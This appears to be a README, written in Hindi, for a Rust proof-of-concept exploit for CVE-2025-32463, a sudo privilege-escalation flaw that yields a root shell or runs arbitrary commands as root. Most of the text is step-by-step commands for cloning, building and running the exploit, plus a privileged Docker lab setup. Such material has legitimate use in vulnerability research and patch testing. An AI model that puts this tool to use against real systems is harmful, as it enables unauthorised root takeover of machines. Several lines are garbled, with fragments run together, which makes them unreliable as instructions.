
Rust-आधारित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2025-32463 के लिए, जो Sudo विशेषाधिकार वृद्धि भेद्यता है। एक इंटरएक्टिव रूट शेल उत्पन्न करता है या रूट के रूप में मनमाने कमांड निष्पादित करता है।
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
./exploit
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
cargo build --release
संकलित बाइनरी यहाँ स्थित होगी:
./target/release/CVE-2025-32463-Chwoot-POC
शोषण बाइनरी को वैकल्पिक कमांड तर्कों के साथ चलाएं:
sudo ./target/release/CVE-2025-32463-Chwoot-POC
id):sudo ./target/release/CVE-2025-32463-Chwoot-POC "id"
वैकल्पिक रूप से, सभी निर्भरताओं के साथ एक पृथक असुरक्षित वातावरण के लिए प्रदान किए गए डॉकर कंटेनर का उपयोग करें।
docker build -t sudo-chwoot .
sudo docker images का उपयोग करके वह प्राप्त कर सकते हैं)docker run --rm -it --privileged sudo-chwoot
cd /home/pwn/CVE-2025-32463-Rust-POC
./target/release/CVE-2025-32463-Chwoot-POC